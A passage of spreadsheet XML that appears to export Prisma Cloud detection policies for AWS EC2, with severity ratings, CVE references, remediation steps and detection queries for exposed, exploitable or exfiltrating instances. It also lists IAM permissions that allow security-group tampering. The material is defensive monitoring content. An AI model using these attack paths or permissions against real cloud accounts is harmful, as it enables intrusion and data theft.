        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1689" s="2" t="inlineStr"/>
      <c r="D1689" t="inlineStr"/>
      <c r="E1689" t="inlineStr"/>
      <c r="F1689" t="inlineStr"/>
      <c r="G1689" t="b">
        <v>1</v>
      </c>
      <c r="H16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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1689" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1689" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Apache Submarine, CVE-2023-46302)</t>
        </is>
      </c>
      <c r="L1689" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1689" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1689" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1689" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1689" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1689" t="inlineStr"/>
      <c r="R1689" t="inlineStr"/>
      <c r="S1689" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1689" t="b">
        <v>0</v>
      </c>
      <c r="U1689" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1689" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1689" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-46302).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Submarine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Submarine (CVE-2023-46302) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X168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CVE-2023-46302
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-46302</t>
        </is>
      </c>
      <c r="Y1689" t="inlineStr"/>
      <c r="Z1689" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-46302'))</t>
        </is>
      </c>
      <c r="AA1689" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1689" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:13</t>
        </is>
      </c>
      <c r="AC1689" t="inlineStr"/>
      <c r="AD1689" t="b">
        <v>1</v>
      </c>
      <c r="AE1689" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1689" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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89" t="inlineStr">
        <is>
          <t>716dfec3-4ae6-4083-8764-55d71bae81c3</t>
        </is>
      </c>
      <c r="AI1689" t="inlineStr">
        <is>
          <t>84ecaba8-9753-4831-a678-603f9a445f95</t>
        </is>
      </c>
      <c r="AJ1689" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1689" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" t="inlineStr"/>
      <c r="B1690" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1690" s="2" t="inlineStr"/>
      <c r="D1690" t="inlineStr"/>
      <c r="E1690" t="inlineStr"/>
      <c r="F1690" t="inlineStr"/>
      <c r="G1690" t="b">
        <v>1</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1690" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1690" t="inlineStr">
        <is>
          <t>Potential indication of data exfiltration activity on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1690" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1690" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1690" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1690" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1690" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1690" t="inlineStr"/>
      <c r="R1690" t="inlineStr"/>
      <c r="S1690" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1690" t="b">
        <v>0</v>
      </c>
      <c r="U1690" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1690" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1690" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and high volume data transfer activity.
The high volume data transfer could be a data exfiltration attempt. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they've collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Attackers can exploit vulnerabilities on the EC2 instances to compromise the confidentiality, integrity and availability of the affected EC2 instance and perform malicious actions. If network connectivity with remote systems known for high volume data transfer activity is observed on a publicly exposed and exploitable EC2 instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate the high volume data transfer activity, remediate the critical or high vulnerabilities and restrict the public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X169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690" t="inlineStr"/>
      <c r="Z1690" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','Unusual high volume data transfer activity from a monitored cloud account') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1690" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1690" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1690" t="inlineStr"/>
      <c r="AD1690" t="b">
        <v>1</v>
      </c>
      <c r="AE1690" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1690" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>e8fb6def-d0eb-43d8-ab19-9d534db7e2a6</t>
        </is>
      </c>
      <c r="AI1690" t="inlineStr">
        <is>
          <t>50763143-164b-4621-9365-8bc81ecf0cd4</t>
        </is>
      </c>
      <c r="AJ1690" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1690" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), CSA CCM v4.0.12, MLPS 2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, MAS TRM 2021, MAS TRM 2021, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, CIS Controls v8, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, CHC HITRUST CSF v.9.6.0, Copy of ACSC Information Security Manual (ISM)-clone, MLPS 2.0 (Level 3), CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, NIST CSF, kashan ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, ISO/IEC 27002:2013, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CIS Controls v7.1</t>
        </is>
      </c>
      <c r="B1691" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1691" s="2" t="inlineStr"/>
      <c r="D1691" t="inlineStr"/>
      <c r="E1691" t="inlineStr"/>
      <c r="F1691" t="inlineStr"/>
      <c r="G1691" t="b">
        <v>0</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1691" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1691" t="inlineStr">
        <is>
          <t>AWS EC2 Instance Scheduled Events</t>
        </is>
      </c>
      <c r="L1691" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1691" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1691" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1691" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1691" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1691" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R1691" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S1691" t="inlineStr"/>
      <c r="T1691" t="b">
        <v>0</v>
      </c>
      <c r="U1691" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1691" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1691" t="inlineStr">
        <is>
          <t>This policy identifies your Amazon EC2 instances which have a scheduled event. AWS can schedule events for your instances, such as a reboot, stop/start, or retirement. These events do not occur frequently. If one of your instances will be affected by a scheduled event, AWS sends an email to the email address that’s associated with your AWS account prior to the scheduled event, with details about the event, including the start and end date. Depending on the event, you might be able to take action to control the timing of the event. If AWS scheduled event is planned for within 7 days, this signature triggers an alert.</t>
        </is>
      </c>
      <c r="X1691" t="inlineStr">
        <is>
          <t>To remediate this alert, review and follow the steps at AWS: Scheduled Events for Your Instances as needed.
For more info: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/monitoring-instances-status-check_sched.html</t>
        </is>
      </c>
      <c r="Y1691" t="inlineStr"/>
      <c r="Z1691" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = 'statusEvents[?any(_DateTime.ageInDays(notBefore) &gt; -7 and (_DateTime.ageInDays(notBefore) &lt; 0 or (description exists and description does not contain "Completed")))] exists'</t>
        </is>
      </c>
      <c r="AA1691" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1691" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1691" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-323</t>
        </is>
      </c>
      <c r="AD1691" t="b">
        <v>1</v>
      </c>
      <c r="AE1691" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1691" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>e1d64985-045e-4a48-9a92-da1a16dcd3eb</t>
        </is>
      </c>
      <c r="AI1691" t="inlineStr">
        <is>
          <t>5b128f6e-9c26-43e5-a833-c5b22bc7eb53</t>
        </is>
      </c>
      <c r="AJ1691" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1691" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" t="inlineStr"/>
      <c r="B1692" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1692" s="2" t="inlineStr"/>
      <c r="D1692" t="inlineStr"/>
      <c r="E1692" t="inlineStr"/>
      <c r="F1692" t="inlineStr"/>
      <c r="G1692" t="b">
        <v>1</v>
      </c>
      <c r="H16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692" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1692" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1692" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to unencrypted sensitive data transmission detected on AWS EC2 instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1692" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1692" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1692" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1692" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1692" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1692" t="inlineStr"/>
      <c r="R1692" t="inlineStr"/>
      <c r="S1692" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1692" t="b">
        <v>0</v>
      </c>
      <c r="U1692" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1692" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1692" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unencrypted sensitive data transmission detected and having permissions that could potentially lead to privilege escalation.
Unencrypted sensitive data transmission via API endpoint exposed to internet includes potential unauthorized access and exploitation. When combined with elevated instance permissions and sensitive data/credentials transmission, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following risky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the API endpoint traffic on the server, add the WAAS rule to prevent this activity, review and remove unwanted permissions assigned to the instance.</t>
        </is>
      </c>
      <c r="X169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692" t="inlineStr"/>
      <c r="Z1692" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name contains all ('AWS EC2 instance with privilege escalation risk permissions','Sensitive data sent via API endpoint exposed to internet without encryption')</t>
        </is>
      </c>
      <c r="AA1692" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1692" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:57</t>
        </is>
      </c>
      <c r="AC1692" t="inlineStr"/>
      <c r="AD1692" t="b">
        <v>1</v>
      </c>
      <c r="AE1692" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1692" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG16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692" t="inlineStr">
        <is>
          <t>470bdde5-6839-4457-a3df-a8de6713bdba</t>
        </is>
      </c>
      <c r="AI1692" t="inlineStr">
        <is>
          <t>8c06d605-a15e-4c39-aee5-0849f39f0781</t>
        </is>
      </c>
      <c r="AJ1692" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1692" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" t="inlineStr"/>
      <c r="B1693" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1693" s="2" t="inlineStr"/>
      <c r="D1693" t="inlineStr"/>
      <c r="E1693" t="inlineStr"/>
      <c r="F1693" t="inlineStr"/>
      <c r="G1693" t="b">
        <v>1</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1693" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1693" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Zimbra, CVE-2022-27925]</t>
        </is>
      </c>
      <c r="L1693" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1693" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1693" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1693" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1693" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1693" t="inlineStr"/>
      <c r="R1693" t="inlineStr"/>
      <c r="S1693" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1693" t="b">
        <v>0</v>
      </c>
      <c r="U1693" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1693" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1693" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Zimbra, CVE-2022-27925]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Zimbra software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Zimbra RCE [CVE-2022-27925] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X169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CVE-2022-27925
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-27925</t>
        </is>
      </c>
      <c r="Y1693" t="inlineStr"/>
      <c r="Z1693" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-27925 - Zimbra RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-27925'))</t>
        </is>
      </c>
      <c r="AA1693" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1693" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:33</t>
        </is>
      </c>
      <c r="AC1693" t="inlineStr"/>
      <c r="AD1693" t="b">
        <v>1</v>
      </c>
      <c r="AE1693" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1693" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>60b4dc1c-3b8f-423a-abfd-cc1ad3b665fc</t>
        </is>
      </c>
      <c r="AI1693" t="inlineStr">
        <is>
          <t>7ace08d4-6b9a-473b-a42d-018b27390ae1</t>
        </is>
      </c>
      <c r="AJ1693" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1693" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" t="inlineStr"/>
      <c r="B1694" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1694" s="2" t="inlineStr"/>
      <c r="D1694" t="n">
        <v>6</v>
      </c>
      <c r="E1694" t="n">
        <v>0</v>
      </c>
      <c r="F1694" t="n">
        <v>0</v>
      </c>
      <c r="G1694" t="b">
        <v>1</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1694" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1694" t="inlineStr">
        <is>
          <t>Security group tampering risk due to a publicly exposed and vulnerable AWS EC2 instance with 'write' permission over security groups</t>
        </is>
      </c>
      <c r="L1694" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1694" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1694" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1694" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1694" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1694" t="inlineStr"/>
      <c r="R1694" t="inlineStr"/>
      <c r="S1694" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1694" t="b">
        <v>0</v>
      </c>
      <c r="U1694" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1694" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1694" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and 'write' permission over security groups.
Security groups are used to control access to various AWS services such as RDS, EC2, and Redshift. Critical or high vulnerabilities on publicly exposed EC2 instances pose significant security risks as attackers can exploit the instances remotely to gain access. Granting 'write' permissions over security groups to a publicly exposed EC2 instances with critical or high vulnerabilities may allow an attacker to gain access to the vulnerable instances and leverage that access to modify security groups and lead to unauthorized access and data breach.
This policy checks for the following write permissions over security groups:
'rds:CreateDBSecurityGroup', 'rds:DeleteDBSecurityGroup', 'rds:RevokeDBSecurityGroupIngress', 'ec2:AuthorizeSecurityGroupEgress', 'ec2:AuthorizeSecurityGroupIngress', 'ec2:CreateSecurityGroup', 'ec2:DeleteSecurityGroup', 'ec2:ModifySecurityGroupRules', 'ec2:RevokeSecurityGroupEgress', 'ec2:RevokeSecurityGroupIngress', 'elasticloadbalancing:ApplySecurityGroupsToLoadBalancer', 'elasticloadbalancing:SetSecurityGroups', 'redshift:AuthorizeClusterSecurityGroupIngress', 'redshift:CreateClusterSecurityGroup', 'redshift:DeleteClusterSecurityGroup'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X169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694" t="inlineStr"/>
      <c r="Z1694" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 with write permissions on security group') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1694" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1694" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1694" t="inlineStr"/>
      <c r="AD1694" t="b">
        <v>1</v>
      </c>
      <c r="AE1694" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1694" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>e0bf153b-98cb-411b-bf57-c519f513da05</t>
        </is>
      </c>
      <c r="AI1694" t="inlineStr">
        <is>
          <t>23b06ad8-95d2-4991-af48-5904324faa30</t>
        </is>
      </c>
      <c r="AJ1694" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1694" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" t="inlineStr"/>
      <c r="B1695" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1695" s="2" t="inlineStr"/>
      <c r="D1695" t="inlineStr"/>
      <c r="E1695" t="inlineStr"/>
      <c r="F1695" t="inlineStr"/>
      <c r="G1695" t="b">
        <v>1</v>
      </c>
      <c r="H16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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1695" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1695" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [OpenLiteSpeed, Multiple CVEs]</t>
        </is>
      </c>
      <c r="L1695" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1695" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1695" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1695" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1695" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1695" t="inlineStr"/>
      <c r="R1695" t="inlineStr"/>
      <c r="S1695" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1695" t="b">
        <v>0</v>
      </c>
      <c r="U1695" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1695" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1695" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [OpenLiteSpeed, Multiple CVEs]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of OpenLiteSpeed software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the OpenLiteSpeed vulnerabilities reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X169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CVE-2022-0072
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0072
   https://nvd.nist.gov/vuln/detail/CVE-2022-0073
   https://nvd.nist.gov/vuln/detail/CVE-2022-0074</t>
        </is>
      </c>
      <c r="Y1695" t="inlineStr"/>
      <c r="Z1695" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-0072, CVE-2022-0073, CVE-2022-0074 - OpenLiteSpeed Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-0072', 'CVE-2022-0073', 'CVE-2022-0074'))</t>
        </is>
      </c>
      <c r="AA1695" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1695" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:36</t>
        </is>
      </c>
      <c r="AC1695" t="inlineStr"/>
      <c r="AD1695" t="b">
        <v>1</v>
      </c>
      <c r="AE1695" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1695" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG16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5" t="inlineStr">
        <is>
          <t>5c18c99b-7800-41da-9a68-94740045e4d8</t>
        </is>
      </c>
      <c r="AI1695" t="inlineStr">
        <is>
          <t>d643bcbc-216e-4706-a0fd-fd93d57cd7bd</t>
        </is>
      </c>
      <c r="AJ1695" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1695" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" t="inlineStr"/>
      <c r="B1696" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1696" s="2" t="inlineStr"/>
      <c r="D1696" t="inlineStr"/>
      <c r="E1696" t="inlineStr"/>
      <c r="F1696" t="inlineStr"/>
      <c r="G1696" t="b">
        <v>1</v>
      </c>
      <c r="H16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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1696" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1696" t="inlineStr">
        <is>
          <t>Unauthorized access or account actions risk due to AWS EC2 instance with unusual usage of instance role credentials and sensitive IAM 'write' permissions</t>
        </is>
      </c>
      <c r="L1696" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1696" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1696" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1696" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1696" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1696" t="inlineStr"/>
      <c r="R1696" t="inlineStr"/>
      <c r="S1696" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1696" t="b">
        <v>0</v>
      </c>
      <c r="U1696" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
